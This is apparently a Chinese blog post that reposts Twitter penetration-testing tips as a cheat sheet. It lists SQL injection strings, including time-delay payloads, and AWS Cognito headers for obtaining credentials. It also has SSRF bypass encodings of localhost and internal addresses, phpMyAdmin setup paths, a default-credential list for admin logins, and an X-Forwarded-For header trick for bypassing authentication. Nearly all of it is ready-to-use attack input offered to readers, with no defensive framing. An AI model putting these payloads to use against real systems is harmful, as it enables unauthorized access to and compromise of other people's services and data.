干货 | Twitter渗透技巧搬运工
VSole2022-08-16 06:46:31
快速检测有无SQL注入
' OR 1=1-- ' OR 1=0-- %27%20or%201=1 *(|(object=*)) )%20or%20('x'='x %20or%201=1 1) or pg_sleep(__TIME__)-- /**/or/**/1/**/=1 ' or username like '% );waitfor delay '0:0:__TIME__'-- or isNULL(1/0) /* x' or 1=1 or 'x'='y
来源:https://twitter.com/_bughunter/status/1521830121270910977?s=20&t=VSyAza5nbjxnUqIw5N9Wyw
AWS Cognito 配置错误
X-AMZ-Target:AWSCognitoIdentityProviderService.ConfirmSignUp X-AMZ-Target:AWSCognitoIdentityProviderService.GetUser 获取凭证访问密钥 ID 和密钥 将标头更改为这样并观察响应 X-AMZ-TARGET:AWSCognitoIdentityService.GetCredentialsForIdentity
来源:
https://threadreaderapp.com/thread/1522086964262051841.html
SSRF Bypass技巧
SSRF Bypasses http://0.0.0.0 http://0 http://0x7f000001 http://2130706433 http://0000::1 http://0000::1:25 http://0000::1:22 http://0000::1:3128 http://2130706433 http://3232235521 http://3232235777 http://2852039166 http://0o177.0.0.1
来源:https://twitter.com/_bughunter/status/1521833353015709698?s=20&t=VSyAza5nbjxnUqIw5N9Wyw
PHPMyadmin渗透技巧
当默认凭据在#phpmyadmin登录时不起作用时,我会尝试访问这些路径 admin/phpMyAdmin/setup/index.php phpMyAdmin/main.php phpmyadmin/pma/ Admin/setup/index.php phpmyadmin/admin/setup/index.php phpmyadmin/setup/ phpmyadmin/setup/index.php
来源:https://twitter.com/tamimhasan404/status/1522814723271512065?s=20&t=lpTy2cTCgvIjmJ9JyE7-8Q
找到管理员登录口,可以尝试以下账号密码
admin:admin admin:a admin:12346578 test:test guest:guest anonymous:anonymous admin:password admin: root:toor root:passw0rd root:root guest:test $sub_name:password ADMIN:ADMIN Admin:Admin : a:a
来源:https://twitter.com/_bughunter/status/1521374403761745920?s=20&t=aInLegLknUcam2qSjbt2PA
漏洞挖掘小技巧-身份绕过小技巧,修改XFF头
Authentication bypass.... Using custom header (See attached screenshot): X-Forwarded-For: 127.0.0.1

VSole
网络安全专家